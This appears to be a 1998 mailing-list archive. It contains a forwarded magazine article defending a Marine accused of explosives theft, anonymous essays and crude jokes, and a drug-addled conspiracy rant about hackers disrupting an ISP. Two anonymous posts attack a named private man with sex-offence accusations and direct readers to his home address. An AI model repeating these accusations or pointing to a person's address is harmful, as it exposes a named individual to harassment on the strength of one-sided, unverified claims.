        Have a look at the following. A loyal, heroic Marine is being
fed to the
        A letter to your congress person and the Commandant of the
Marine Corps,
with an info copy to your local newspaper, would help.
        For those who might want to help a good Marine financially he
would be
forever grateful.
Tim Witham Legal Defense Fund
c/o Robert Ferris
Box 538
Jacksonville, NC  28541
        SEMPER FI and perhaps the top brass in the Corps should refresh
as to what this wonderful expression  means.
14, March 16, 1998
NATION: "Criminal Injustice?"
        To judge from his military paper trail, Marine Sergeant Timothy
Witham, a
33-year-old Explosives Ordnance Disposal (EOD) specialist, is the
embodiment of the Corps. A veteran of Desert Shield/Desert Storm, Witham
has also served with distinction in Somalia. Superlatives suffuse his
service record: "Sergeant Withams professional achievement, initiative
loyal dedication to duty  reflected great credit upon himself and were
keeping with the highest traditions of the Marine Corps and the United
States Naval Service," declared Lt. Colonel G.C. Cutchall in a citation
issued when Witham received the Navy Achievement Medal.
        In a letter endorsing Withams application to become a Warrant
Candidate, Lieutenant Colonel E.M. Smith, his former commanding officer
North Carolinas Cherry Point Marine facility, praised Withams
leadership  high degree of maturity  poise, understanding and tact."
addition to his military service, Witham has also excelled in joint
projects with civilian agencies, according to Smith: "He has established
tremendous rapport with outside agencies such as the FBI, various ATF
bureaus, Secret Service, DEA and other police agencies." Withams
includes a certificate of appreciation from the Secret Service for his
as part of a presidential security detail at the 1996 Atlanta Olympics.
was also entrusted with similar security responsibilities during the
Middle East peace talks and the UNs 50th anniversary in 1995.
Abrupt Change of Heart
        Noting that Witham is "loyal, displays sound judgment, and is
exceptionally reliable and trustworthy," Lt. Col. Smith recommended his
application "with utmost enthusiasm." Withams current commanding
Lieutenant Colonel J.G. Ayala of Marine Wing Support Squadron 271,
a similarly glowing endorsement last September. "[Witham] leads from the
front. Superior knowledge of the EOD field. Can handle any mission and
looks forward to challenging assignments," declared Ayala. "[Witham is
true asset to his section and to this Squadron. His knowledge and
would make [him] an outstanding candidate for the warrant officer
        However, Ayalas opinion of Witham underwent an abrupt change
just a few
weeks later. "SSgt. [Staff Sergeant] Witham has proven that he is a
to the good order and discipline of the Squadron and the U.S. Marine
Corps," insisted Ayala in an October 17th memo. Ayalas radical
reevaluation of Witham followed the October 16th arrest of Witham and
other Marines as a result of "Operation Longfuse," a 16-month joint
operation conducted by the FBI, the ATF, and the Naval Criminal
Investigative Service (NCIS). Witham found himself accused of
a loaded weapon on base; conspiracy to commit larceny; larceny of
explosives, equipment, and firearms; wrongful disposition of military
property; receiving stolen property; [and] federal firearms and
violations under the Federal Assimilated Crimes Act."
        Upon his arrest, Witham was designated "a flight risk," which
led Ayala to
support "continued confinement" until his pre-trial hearing  which
out to be a 79-day jail term. "Lesser forms of restraint would be
inadequate to insure that he would appear at his hearing and
court-martial," insisted Ayala. "This is not the first time that SSgt
Witham has been involved in this type of incident." Curiously, in the
memo, Ayala noted that there had never been any previous disciplinary
action taken against Witham  which would suggest a serious delinquency
the part of his superiors if Witham had indeed been "involved in this
of incident" on earlier occasions. Just as curious is the fact that Form
1070 in Sergeant Withams personal file, which lists "offenses and
punishments," is entirely blank.
        Literally in a single day, a model Marine with an unblemished
record was
transmuted into a felonious arms smuggler whose motivations were equal
parts greed and radical "anti-government" views. Federal and military
investigators have yet to find a particle of material evidence to prove
that Sergeant Witham is the criminal they describe; their case depends
entirely upon the testimony of three eminently impeachable witnesses  a
twice-convicted perjurer, a civilian ex-convict, and an ex-Marine of
dubious integrity who served as a "confidential informant" for the feds
during the undercover operation. Two of the witnesses peddled their
testimony against Witham in exchange for lighter sentences. The
"confidential informant" made an even better deal: He arranged for
immunity before beginning his undercover work, and since October 17th he
has been taken into the witness protection program.
        Last September, Staff Sergeant Timothy Witham was chosen from 20
qualified candidates to become a Warrant Officer; now, after spending 79
days in jail, he faces the prospect of an April court-martial. Robert
Ferris, a retired Marine officer and former commanding officer to
told The New American: "I spent 24 years in the military, in the Army
Marines, and Ive never seen an abuse of power to compare with the
treatment of this young man. He should be at Quantico going to school to
become a Warrant Officer, and yet hes exhausting his life savings and
seeing his career destroyed because the feds need to convict somebody to
make a political point." The "political point" being made in the case of
Tim Witham appears to be that mere suspicion of "anti-government" views
enough to destroy the career of a model military man.
Extremist Spin
        The "Longfuse" investigation cast a net across several states,
leads as far south as North Carolina and as far north as Massachusetts.
Fourteen suspects were arrested on October 17th  eight civilians and
Marines, including four stationed at Camp Lejune. Over the course of a
and a half, undercover investigators, focusing their efforts on gun
military bases, and gun dealers throughout the southeast, had purchased
estimated 150 pounds of plastic explosives, grenades, grenade launchers,
shoulder-launched rockets, a handful of anti-personnel mines, and more
50 machine guns. In the post-Oklahoma City bombing environment, the
preferred spin of federal investigators was entirely predictable.
        Robert Ferris, who is now Withams next-door neighbor, was a
witness on
Withams behalf at two preliminary hearings: the "Magistrates hearing,"
which is held to determine if pre-trial confinement is necessary; and an
"Article 32" hearing, which is the military equivalent of a grand jury.
"The first thing out of the mouth of [military prosecutor] Captain
[Michael] Richardson was Ruby Ridge," Ferris recalls. "They insisted
Tim was part of a ring of anti-government radicals who were stealing
weapons and had sworn not to let the feds take them alive." Thus was
identified as part of the ubiquitous menace of "right-wing extremism."
Initial press coverage of the "Operation Longfuse" arrests played up the
alleged "anti-government" angle, and the feds did their best to abet
speculation  at least in the beginning.
        "Federal agents seized truckloads of stolen military and
civilian weapons
yesterday in an expanding investigation into the theft and sale of
guns, grenades and plastic explosives," screamed the October 18th
Sun. The paper reported that an anonymous investigator portentously
that some of the civilian suspects arrested "have ties  potentially 
militia groups." The Raleigh, North Carolina News and Observer carried a
similar warning: "A top official said he could not rule out the
that anti-government extremists were connected to the theft of military
ordnance from Camp Lejune."
        "These are weapons that are of military use, very lethal
weapons, and they
were weapons that were in the wrong hands," fretted Treasury Department
spokesman Jim Johnson at an October 17th press conference. "Thats the
of thing all citizens should be concerned about." Pentagon spokesman
Kenneth Bacon added the disturbing observation that "C-4 was taken,
is highly dangerous and used by terrorists."
        For those who missed the message, the Dallas Morning News
offered a useful
summary: "Concern over the theft of high explosives has increased in
military circles along with a broader anxiety about domestic terrorism,
especially in the aftermath of incidents such as the bombing of the
Oklahoma City federal building."
        The "right-wing menace" is the medias favorite enemy, and ATF
were careful to drop tantalizing hints that "Operation Longfuse" had
uncovered something big. "You could outfit a small army with what weve
recovered," claimed ATF special agent Mark Logan. ATF spokesman Earl
Woodham primed the press for further dramatic developments: "The
investigation has really just begun. Its like we just hit the base of
oak tree, and if we follow it up, we may find that it branches out very
Dubious Informant
        The man who planted the acorn that grew into the ATFs "oak
tree" is a
former Marine sergeant who had served as an EOD specialist with several
the arrested suspects. In early 1996, this sergeant reportedly
"Operation Longfuse" when he approached authorities at Camp Lejune to
them that weapons and explosives were being stolen and sold at gun shows
and gun dealerships. That his motives werent purely idealistic is
suggested by the fact that he was careful to get complete immunity
taking an assignment as a paid confidential informant (CI). For the next
year and a half, the CI worked numerous stings against Marines and
gun enthusiasts.
        The feds deployed other undercover assets as part of "Longfuse"
and tried
to tailor stings to the psychology of the suspects. In the case of
Crawford, a Marine captain stationed in Massachusetts who was among
arrested on October 17th, the undercover agents reportedly posed as
intelligence specialists who sought arms and explosives for deniable
missions in Latin America  "an Oliver North-type black ops project,"
according to one source. In the case of a second Marine sergeant who was
caught in the sting  and who became the second witness against Witham 
undercover feds reportedly posed as organized crime figures.
        "[The second Marine sergeant] wasnt going anywhere in the
Sergeant Witham asserted to The New American. "He was consistently
promotions; you might say he has more pass-overs than a satellite. I
suspect that he had a real need to feel important, and the undercover
agents were happy to feed his ego."
        From information made available during legal discovery, Witham
the second Marine "got involved in long drunken discussions with the
undercover people in which he claimed to have been involved in all kinds
crimes, including at least one murder. He supposedly helped kill a guy
then disposed of the body with a woodchipper. Strangely, though, the
prosecution didnt follow up on that particular story."
        The feds were willing to give credence to the second Marines
alcohol-aided claims about Witham, which were covertly recorded. "They
initially used those drunken boasts to make three charges against me,"
Witham recalls. "The first was that I had been involved in the theft of
washing machines, dryers, and other appliances, as well as drywall and
other things of that nature. The second was that I had been involved in
forgery, and the third was that I had been involved in the theft of
explosives. The prosecution dropped the first two charges but has stuck
with the third."
        How credible is the second Marine as a witness? According to
local press
reports in North Carolina, he has twice pled guilty to perjury.
Furthermore, he faced accumulated prison terms of up to 380 years on
charges arising from "Longfuse" and reportedly made a deal with the
prosecution in which he could peddle his testimony against others for a
total of 12 years in prison  with the possibility of parole after four.
The third witness against Witham has served a prison term on
firearms-related charges. He also reportedly made a deal for his
in a previous weapons theft case involving Army personnel.
Casting a Large Net
        Given his own solid military background, and the dubious
background of the
witnesses against him, how did Sergeant Witham get entangled in this
Attorney Vaughn Taylor, who has acted as Withams legal counsel,
that the sergeant was "caught in a very large casting net" thrown out by
federal investigators. "There were two things that the government found
very significant," Taylor related to The New American. "First, they were
looking for people who had worked with Captain Crawford in EOD;
they were looking at gun shows and people who did business at them. Of
course, these two facts dont add up to a case, particularly when the
suspect is someone like Tim Witham. As far as his military career is
concerned, Witham all but walks on water; its impossible to imagine
someone farther from the person described in these charges."
        Nor were the feds able to develop a material case against
Witham. On
October 17th, agents from the ATF and NCIS conducted a search of
home in Jacksonville, North Carolina; this included an examination of an
adjoining building from which Witham, a federally licensed firearms
sold guns and related merchandise. The October 20th "Report of
Investigation" filed by special agent John S. Corpening of the ATFs
Wilmington, North Carolina field office noted that "no machine guns or
prohibited weapons were found" during the search of Withams home and
business. The report did note that Witham was in possession of a stolen
Ruger pistol. The gun had been brought to Witham for repairs; when he
ran a
check on its serial number, he learned that it was a stolen weapon, and
informed the ATF. As instructed, Witham logged the stolen weapon in his
Acquisition and Disposition record, and held it on behalf of the ATF.
        "Strangely, the ATFs search of my home was conducted, in part,
students of mine," Witham informed The New American. "For about three
Ive been involved with some of them in a drug interdiction program, so
they knew me well before all of this." (Witham has also helped train ATF
and FBI personnel in explosives disposal.) Despite the effort on the
of NCIS investigators and Marine officials to depict Witham as a danger
public order, the ATF did not seek revocation of his federal firearms
license. "Even though I was in jail for 79 days and face court-martial,
firearms license is still active, and my inventory is still intact,"
observes Witham. "If I had done all of the things Ive been accused of,
any of them, would the ATF have left me with my weapons?"
        On December 19th, Major Robert Brubaker, the Judge Advocate
investigator who presided over Withams "Article 32" investigation,
his report, which once again noted Withams sterling record and the
of the case against him. "Evidence was presented demonstrating that
Withams military character up to this point has been excellent,"
pointed out. "He has a clean, in fact quite distinguished, service
For a man identified as a "flight risk," Witham displayed little
inclination to escape when presented with the opportunity. Brubaker
that the "chasers"  the MPs assigned to watch Witham  were quite
"To say that their supervision of their charge was loose would be an
understatement," reported the investigator. "I observed a couple of
occasions when SSgt. Witham was alone without the chasers in sight.
was one occasion when SSgt. Witham himself tracked down his chasers to
them he was going somewhere and they needed to be with him. To me, this
rather strongly cuts against any argument that he is a serious flight
        While Brubaker stated that "there probably is sufficient
evidence to send
the case to a court-martial," he also took note of the fact that "the
government seems to be relying quite heavily on the statements of two
witnesses of questionable integrity" to make its case against Witham.
(Since that time a third witness has also offered to testify against
Abuse of Power
        It is possible that Withams impeccable service record belies
involvement in the felonious theft of military weapons and explosives.
However, it is at least as likely that he is merely an exemplary
who has been traduced by perjured statements offered in exchange for
special prosecutorial considerations. His case serves as a precautionary
tale about the federal governments increasing reliance upon paid
undercover informants, especially in firearms-related investigations and
other forms of covert operations against the "radical right." In his
Deadly Force, law enforcement analyst Carsen Stroud points out that in
the Justice Department budgeted $100 million to spend on confidential
informants, many of them involved in "quasi-criminal or actively
        Also significant is the potential impact on military morale
Sergeant Witham prove to be the innocent victim of a politically
abuse of prosecutorial power. "I love the Marine Corps and have great
respect for our federal law enforcement agencies," declares Robert
who was himself a respected field-grade commander. "But what is being
to Tim is simply wrong; its an abuse of power by corrupt and ambitious
people who are, by God, going to get a conviction, whatever it takes to
so. In nearly a quarter-century of military service Ive never seen a
comparable abuse of power."
William Norman Grigg
Visit our home page at: Sign up for the free weekly Defending America newsletter on our website
Snail mail to:
P.O. Box 430
Whitefish, MT.

@_date: 1998-04-16 02:19:55
@_author: Anonymous 
@_subject: The Great Internet Bandwidth Crisis 
It seems to me that the chief impediment standing in the way of the
Internet becoming a propaganda and marketing tool suitable for use
and control by a few rich and powerful business entities is the comparatively inexpensive and easy access of millions of users to
the same technologies available to megacorporations.
History itself leads me to suspect that the money and power moguls
will use a variety of real and imaginary issues to place greater
monetary burdens and access restrictions on many aspects of the
Internet and Web, particularly those that have commercial potential.
A current example is the attempt by various Telecos to raise the cost
of access for other businesses, citing alleged burdens placed on their
resources by ISPs at the same time that they are scrambling to enter
the same market by undercutting their competitors.
The Great Teleco Resource Crisis will undoubtedly be mirrored at some
point in the future by the Great Internet Bandwidth Crisis. I suspect
that although it will be as bogus as the Telecos' current imaginary
crisis, it will come at a time when the major players have divided up
enough of the infrastructure pie among themselves to be unanimous in
their nod-and-wink agreement as to the severity of the crisis.
Undoubtedly, this will be just one of a variety of crisis in which will require restrictive legislation and cost-increasing regulations
that will save bandwidth for future children and protect adult citizens
from the extreme danger of engaging in commerce with other average
adult citizens such as themselves.
It seems to me that the *only* way that the Internet can be kept from
being used as just another tool for herding the masses into larger and
more efficient feeding pens is to enable and empower the citizens to
freely and safely control their own financial and commercial destiny
in their Internet transactions.
The more accessible and widespread the control over one-to-one monetary
transactions, the more difficult it will be for a few entities to lead
the citizens around by financial rings run through their noses.
The government currently has a variety of budgetary axes held over the
heads of the citizens, such as federal funding and grants in which
money taken away from the citizens is returned to them on a statewide,
local or individual basis only upon conditions that involve giving up
rights and liberties that are due them.
In order to resist being herded by a myriad of legal, licensing and
regulatory 'axes' into increasingly global feeding pens, the citizens
will need access to tools which allow secure financial transactions with
differing levels of identity versus anonymity available to them.
The reason that major business has not yet been able to divide up the
financial pie available through the Internet is the excessive amount
of resources that they need in order to compete for the attention of
Internet users, given that average citizens are providing equal or
better information and services for free or for a low cost.
The sooner that the masses are able to engage in free commerce with
one another via the Internet--whether it be giving Grandma Jones a
dollar for her cookie recipies, or engaging a student across the
continent in private research in return for money, for goods or for services--then the sooner the masses will scream loud and long
when government or corporate entities threaten to take this ability
to be self-sufficient away from them.
Those who wish to circumvent the loss of privacy, liberty and freedom
that they forsee as being possible on the Internet need to realize that most of those who are not currently empowered to manifest those
possibilities in their individual life will little recognize or
protest the 'present' loss of those 'future' possibilities.
Unless there is a widespread dissemination of working tools accessible
to the average citizen, then the future will be controlled by those
with the funds and resources to limit financial transactions on the
Internet to a self-defined 'way things are.'
"Teach a man to buy his fish from you, and you'll feed yourself for
 a lifetime."

@_date: 1998-04-16 02:20:13
@_author: Anonymous 
@_subject: IntenseWhore VidKid Sex Machine 
PLAY STATION Vidkids hooked on high-impact games with stereo sound
tracks will have a tough time leaving their seats at next month's E3 convention. That's when BSG Laboratories will debut the Intensor,
a $500 speaker-studded chair (with between-the-legs bass and separate subwoofer) to give hard-core players a body-thumping shot of visceral   It seems to me that enterprising children with mechanical ability should be able to use common household items, such as vacume cleaners,
blow-driers, doorknobs and wax-fruit to 'enhance' the vidiot experience
that BSG Laboratories will be pimping.
  It seems to me that an enterprising young Tom Cruise type might be
able to combine an enhanced version of the IntenseWhore with a variety
of adult MPEGs and pick up some major cash in between his friends'
'cumings' and goings.
  Sounds like something for the 'Got My Nut'ly News to pursue.

@_date: 1998-04-16 16:36:30
@_author: Anonymous 
@_subject: NoneRe: Gary Lee Burnore, Registered Sex Offender in Raleigh, NC 
If the girl's mother had heeded the earlier warning she received via e-mail
about your behavior several months earlier (the one you called "harassment"
at the time), this all could have been prevented.  You're lucky that the
11/96 "kiss" is all you were arrested for.  You were foolish to continue it
knowing that Nancy had already been tipped off.
In case you've forgotten, you whined:
-> So now the cowards in Ronald Francis's corner (I'm outright expecting the
-> culprit to be ronald francis himself) have taken to sending email to
-> those who have names listed on databasix's web page.  Sending comments to
-> a 17 year old that they're going to tell her mother that she's having an
-> affair with me.  Telling her mother that I'm molesting her daughter.
-> Having all sorts of fun.
And you threatened to report the anonymous whistleblower to the
authorities?  What chutzpah!  You're molesting a minor, someone tips off
her mother, and you threaten to report the person who tipped her off about
your behavior?
Your claim has now been proven to be a lie.  How would the mere fact that
the girl had a web page at databasix.com have alerted an outsider to the
fact that you were molesting her?  Presumably she didn't post her diary on
her web page, detailing your sexual activities towards her.  Where would
"Ronald Francis", or any other random "harasser" have obtained this
information?  You were too quick to dismiss the idea that all the alleged
"harassment" and spam baiting might have originated from a DataBasix
insider with detailed knowledge of your private life, as well as the
complete list of all DataBasix employees and customers that Belinda Bryan
claimed had been "spam baited".  Who else is getting ahold of all this
inside info, Gary?
But apparently it was serious enough that both your victim and her mother
thought you needed psychiatric help.  (Plenty of people on usenet could
have told you that.)
You spent $30K on what was supposedly a misdemeanor charge to which you
pled guilty?  Someone must have seen you "coming"?  Was it Nancy?
The maximum penalty for a misdemeanor is what?  6 months + $500?  You spent
$30K to get off with 3 years probation?  On a 6 month sentence, you'd
probably have been out in 3 months, and that's assuming you got the maximum
sentence.  Or was the $30K to get it plea bargained down from a more
serious charge?
I thought the shrink was to ensure that if didn't.
What statute in California makes it a misdemeanor to kiss a 17 year old
girl?  (It must make senior proms a lot of fun there if such a law really
exists as you claim.)  Or does it depend on what part of her body you
"kissed" her?
It's also interesting that when it was revealed that you had also been
arrested in San Francisco for unlawful assembly in blocking traffic, you
minimized it and called it a mere "traffic ticket", concealing the fact
that you had already been convicted of something more serious.
Then when someone finally reveals a second criminal conviction on your
record, your sock puppets whine that it's a "half truth".  Well, gee, Gary,
you were content when the WHOLE truth was being concealed.  So much for you
"I have nothing to hide" boast!

@_date: 1998-04-17 15:36:50
@_author: Anonymous 
@_subject: NoneRe: Gary Lee Burnore, Registered Sex Offender in Raleigh, NC 
But Gary Lee Burnore, the convicted pedophile, saw fit to comment anyway,
refuting his own claim.
No one is forcing you to reply if you think a post contain "nothing of
Gee, Gary, it was the state of North Carolina that PUBLISHED your arrest
record for "indecent liberties with a minor" on its PUBLIC website.  Maybe
you ought to ask them for their "demands".  All I did was respond to a
NON-ANONYMOUS query by a hotmail.com user asking if the Gary Lee Burnore
that was ALREADY PUBLISHED on the NC website was you.
Only because you and your sock puppets chose to publicly comment is this
thread even continuing.  And consider the fact that most of the details,
such as the fact that the victim was a 17 year old female, and that you
were sleeping on the couch at her mother's home, came in a NON-ANONYMOUS
post from Camille Klein, who allegedly obtained this information from YOU.
I only GUESSED that the victim was the same one whose mother had earlier
been privately tipped off about you.  Even my knowledge that a whistle
blower was involved came from one of YOUR public posts.  Unless you've been
an overnight guest in the homes of several women in Santa Clara, each with
17 year old daughters, then you've provided more details than all the
anonymous posters put together have or even could have.
In your haste to make unproven accusations over a year ago against someone
who had public challenged you, you chose to post information that would
have otherwise been unavailable to the general public that would later
implicate you.
Make up your mind, Gary.  Have you molested more than one minor, giving you
doubts that I'm referring to the right one (since I've never named anyone)?
Why else would you ask me to prove that I know who the victim really is in
one paragraph, then complain that I'm "dragging the victim through the mud"
in the next?  How could I do the latter if I didn't really know who she
was?  If you're going to lie, you need to be a bit more consistent.
And, BTW, where did I claim that I knew the identities of either the victim
or of her mother?  All I've said is that the person who tipped them off
obviously did know that.  I wouldn't have even known that unless you'd
complained about it publicly.  You are the one that volunteered the
information that the victim had a web page at DataBasix, so if the victim
was identified in any way, it was by you.  Of all the 17 year old girls in
Santa Clara, saying that she had a web page at DataBasix sure narrows it
down, doesn't it?
And wouldn't it be a strange coincidence that you'd been accused of
molesting one teenage girl, allegedly falsely, and then you're later
convicted of molesting a totally different teenage girl of the same age,
living in the same city, and that you'd been an overnight guest in both
homes?  I do believe it was you who remarked a year ago that "there are too
many coincidences".
No, but why let the facts spoil a perfectly good Burnorian fantasy?  You've
had a history of taking whoever pissed you off the most recently and
accusing him of all sorts of unproveable things.  Back when someone tipped
off the victim's mother via PRIVATE e-mail, YOU stated PUBLICLY that it was
"Ronald Francis".  That was the first public indication that there even was
a victim that you had molested!  You just unwittingly confirmed it by
complaining about the whistle blower in a public post.  The NC website is
just further confirmation, as is your own admission that the victim was a
17 year old female.
If you've got a beef against RFG, why not take it up with him?  You've got
his e-mail and snail mail addresses.  Why is it that you accuse others of
doing the very things that you do yourself?
If you really think that I'm "RFG", why did you post this publicly and not
e-mail it directly to him (allegedly me)?  Another hole in your paranoid
Anyone wishing to meet a convicted sex offender face to face is welcome to.
I'll decline your gracious invitation, thanks.  Anyone desiring to do so
can find your home address on the NC website.
Your proof of who allegedly posted this information, a charge that you've
NEVER been able to document, is what?  If, as Belinda Bryan claimed, someone
obtained the names and addresses of *EVERY* client and employee of DataBasix
to usenet (which has never been proven), who do you suppose would be in a
position to obtain such information?
It looks like more dirty tricks by the DataBasix wrecking crew are in the
works, huh?  Anything to intimidate anyone who gets a little too close to
the truth about your activities.
     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
How gracious of you, Gary.  Feel free to post your inane denials, too.
The drunk guy at the party with the lampshade will sober up.  A convicted
pervert and molester who preys un underage girls is a different story.  I
suspect that most parents would prefer to have "Mr.  Lamshade" in their
neighborhood to Fester the Molester.
"They"?  You and your sock puppets?  The truth hurts, doesn't it, Gary?
If you're going to whine that anonymous people are "assholes" just because
they'd prefer not to let a CONVICTED SEX OFFENDER know their identity and be
able to track down their home address where their children live, then you're
entitled to that self-serving opinion.
You're still pissed that someone anonymously tipped off your victim's
mother and high school principal, aren't you?  That's what started your
paranoid little vendetta against anonymous posters and remailers.
It's you that's making the accusations.  If you're saying someone is lying,
then prove it.  The people who have posted information have posted the URLs
from unbiased, third-party sites, including those of the state of North
Carolina.  The only rebuttal has been your own unsubstantiated claims.
Either the URL that has been posted as a reference is accurate, or else
this mythical "anon asshole" you've been whining about for nearly two years
has somehow infiltrated the San Francisco and Santa Clara police
departments, the victim and her mother, as well as the state of North
Carolina's registered sex offender website, created bogus arrest records,
forged a sex offender registration form, and surreptitiously taken the
mugshot just to make poor, innnocent Gary Lee Burnore look bad.

@_date: 1998-04-17 19:56:16
@_author: Anonymous 
@_subject: Dead Men Don't Wear Dentures! / Prologue 17/0 - SPACE ALIENS HIDE MY DRUGS!!! 
Saturday, April 18, 1998 - 00:02:36 MET (MeatSpace Eternal Time)
Prologue 17/0 -- SPACE ALIENS HIDE MY DRUGS!!!
Yo PsychoPukes!
I am sending this alcoholonymously so that only those who are
connected to the ScotchServer will be able to transylvaniate
the chalice filled with the blood of my martyrdom and nibble
on the edge of the 'crackers' diagnosis of my body, in order
to Divine which porn-movie star I am currently channeling,
thus being able to monitor and properly categorize both the
level and quality of shit which I am about to spew forth in
yet another rambling diatribe on the various ways in which
my dichotomous insanities relate to crypto and privacy, and
are therefore relevant to the BikerSucks Distributors List.
Although I am capable of telling all manner of outrageous lies
under cover of my usurptation of the multi-user TruthMonger
persona, in my role as the pathetic, drunken ScotchMonger, I
am incapable of rising above any level beyond wallowing in
a self-pitying confession of moral failures and character
weaknesses which anyone with even a modicum of self-respect
would refrain from revealing to God, Himself, let alone to
The Dark Allies of the Oppresor (TM) have descended upon my
personage and taken a large byte out of my ass by wiping out
my WebSite and confiscating my computers, as well as those of
my guilty-bystander nephews.
As much as I would like to portray myself as a 'martyr for
the cause' of free speech and privacy, the whole affair pretty
much boils down to the fact that I am pretty much a mentally
deranged shit-disturber who would salute the flag and spend
my whole day singing 'God Save The Queen' if I was told that
it was illegal or socially unacceptable to do so.
Add to this the fact that I have long been involved in a variety
of illegal and illicit nefarious activities that I have little
capacity to understand, and I can pretty much be written off as
a sorry loser who pretty much deserves to be used as cannon
fodder in the war between those with connections to opposite
poles of the ClueServer.
In regard to the undeniable reality of being an ignorant schill
useful as a protective buffer between my Muppet Pastors and
Brogue Brothers willing Prawns, I can only say that I am proud
to have been able to offer my services as a loudmouth asshole
in the furtherance of a cause that it is beyond my intellectual
capacity to fully understand.
The Good News (TM) is that anyone reading this rambling, semi-
coherent missive can rest assured that the details of what I
am sharing have no need of embellishment, since I, myself, play
absolutely no part in my current role, being merely a sorry,
pathetic dupe of those whose mental faculties have not been
decimated by years of alcohol and drug abuse.
My career as an international recording artist and touring
musician was nothing more than a charade designed to disguise
my mental aberrations under the cover of an acceptable long-
haired country outlaw persona.
My career as 'The World's Foremost Computer Expert' was equally
a charade designed to disguise my technical and professional
incompetence under the cover of an image as an eccentric genius.
The foregoing being said, let me share with you a few things
which make me laugh until I pee my pants, drop my dime, and
mess my drawers.
Since the original release of 'The Xenix Chainsaw Massacre' in
1989, I have gathered a following of hackers, crackers, phreaks,
phracks, punks and mental cybermisfits that would provide a
lifetime of research for any psychologist whose goal was to study digitally-based insanity.
Recently, those who have spent years feeding me information to
be released on an "I don't have the foggiest idea what it means"
basis, went underground, for the most part, as  a result of a
variety of attacks directed toward them by those who wish to
control and manipulate each and every aspect of the Brave New
Digital World.
Nonetheless, today I got a syruptacious message from the grand
personage known only as the Evil-1, informing me that, although
the Usual Suspects involved in taking control of my InterNet
accounts have faded into the background, due to a sharp rise in
the monitoring of my account, unknown player/warriors have come
out of nowhere to throw a serious fuck into the ISP which so
high-handedly murdered my WebSite, without a single word of
explaination to myself or anyone else.
The Evil-1, sending me a private email (using the
SysAdmin account at the Well), informed me that some kind soul
has turned the programs used to surrupticiously monitor my email communications into global programs which perform the
same tasks on the account of each and every customer of my
ISP, thus tying their tubes in a knot that  cannot be undone
by anyone they have on staff, or by the professional computer
spooks that have been imported to build a coherent conspiracy
out of my mad ramblings.
As well, a dear lady friend (who has been instumental in making
the dev.null server a living reality for the better part of a
decade) informs me that a variety of hackers and crackers who
are only peripherally connected to the HyperPukes Distraught
Baleing-Twine List, seem to be involved in accessing my ISP's
computers to perform mysterious tasks that have purposes that
even she cannot divine, with the enormous amount of tools and
resources at her fingertips.
To quote her directly, "The esteemed Lost Alamo Boys and Girls
4-H(orsemen) Club is unanimous in their opinion that the highly
professional and superbly trained guerilla units of the Magic
Circle are in no way superior to the unknown entities currently
crawling out of disparate locations of the cyberwoodwork to
lend a confusing hand to a common goal which is shared by none
and championed by all."
In short, it seems be the general consensus among those who have
spent years dogging my CyberTrail as a result of my use as an
expendable schill suitable to act as a front-man/target for the
dissemination of innocuously dangerous manuscripts, that the
'creme de la creme' of ZOG's MeatSpace CyberGestapo is sucking
hind-tit to an untraceable, unorganized, Cult of One/Army of Dog
pseudo-phenomena that is very likely composed mostly of Doodze
and Doodzettes who spend more on Clearasil than the NSA and DOD
spend on computer security, combined.
Lest you, as a CypherPinko, think you can get away with dismissing
the preceding as the mad ramblings of a psychotic, drunken, mental
case under the influence of bizarre combinations of legal and illegal drugs (which is, actually, the case), stop and think about
the things that you, yourself, have done over the course of your career as a part-time miscreant, during which you have performed inexplicable feats of derring-do which were far beyond your capacity, given your technological expertise and experience, but which were brought to successful fruitation by virtue of the clarity of purpose and the strength of committment that you brought to the activity.
If you have made a habit of selling yourself short for your seeming
accomplishments because you convinced yourself that you, and your
accomplishments, are 'ordinary', then you need to review your life,
your actions, and your accomplishments, while keeping a Taoist eye
open, and a Taoist ear cocked, for the subtle signs of a Magic at
work which goes beyond Mathematics and steps into the arena where
Conscious Will defines the paridigms within which Reality is manifest according to the dictates of Dreams and Desire.
Despite my obvious dysfunctionality in a world which demands a strict
adherence to the Norm (TM), I reign supreme as a Prophet and Conspiracy
Theorist Extraordinaire.
"We make our Gods, and do battle with them...and they bless us."
~ Herman Hesse ~
Anyone who honestly researches the wildest of the claims made in
the 'True Story Of The InterNet' manuscripts will be able to prove
for themselves the reality of even the most preposterous of the
wild and weird pronouncements of collusion between a far-reaching
network of Circle of Eunuchs conspirators.
Those who check the details surrounding the warnings to Jim Bell
shortly before his persecution, the arrival of the son of gomez
on the doorstep of his mentor mere hours before gomez was cut
loose from a company he had founded a decade and a half earlier,
the synchonicitous messages from the L.M. Boyd sampler and the
A.Word.A.Day bulk emails mirroring releases of the 'True Story'
manuscripts, the coincidences of timing between major events in
the story of the Unabomber and the activities of the Author, ad
Those who diligently and honestly check the MeatSpace details
surrounding the space-time continuum of these events will be
left with no doubt that the true, discernable facts surrounding
the events are perfectly consistent with the claims of the
'True Story' manuscripts that there is an underground movement
in the computer industry which supports, confirms and enhances
the work of separate guerilla cells working independently, yet
within a concrete and discernable paradigm encompassing a common goal.
The Truth, The Whole Truth, And Nothing BUT The Truth:
[Note from the Otter: I have every reason to believe that
 I am currently 'marked for deletion' from the List (TM)
 of those whom the DickMongers can't be bothered butt-
 fucking just yet, so anyone who dares to suggest, in the
 remotest corner of their mind, that I have anything to
 be gained by embellishing or distorting the Truth in  regard to my most dearly held beliefs, based on my life
 experiences...can go fuck themselves.
 OTOH, anyone who wishes to discount what I am about to
 say on the basis that I am a drunken, psychotic drug-
 addict with a slim hold on Reality (TM) probably has
 a case that would hold up when pleaded before a jury
 of Phillip Hallam-Baker's peers.]
All of the wild and preposterous claims made in the
'True Story of the InterNet' manuscripts, in regard to the verifiable trails of intrigue connecting the Author
with the pesonages and events of a wide variety of deeply meaningful events in the battles between the
Forces of Light and the Forces of Darkness taking place
on the battlegrounds in Waco, Ruby Ridge, San Diego,
Sacramento, etc., etc., are Total HorseShit (TM) in
the world of MeatSpace, and Totally True (TM) in the
world of Reality (TM).
You see, Reality (TM) is nothing more nor less than the fulfillment of the totality of our individual thoughts, beliefs, hopes, dreams and actions. And the
Spheres of Reality encompass physical and virtual territories ranging from the MeatSpace and MindSpace
bounded by an individual Cult of One persona, to the
time-space continuum bounded by Infinity and Eternity.
In short, when the Author's missives are supported and confirmed by a web of totally unrelated facts and circumstances which consistently mirror the wild and
outlandish claims being made, it is because when any
living entity in the universe takes a step in a self-
willed direction, the underlying fabric of the Tao
changes shape to bring itself into alignment with the
consciously willed goal of that entity.
The True Battle (TM) taking place within the confines
of MeatSpace Reality is the battle of conscious, self-
willed individuals writing Reality Scripts capable of
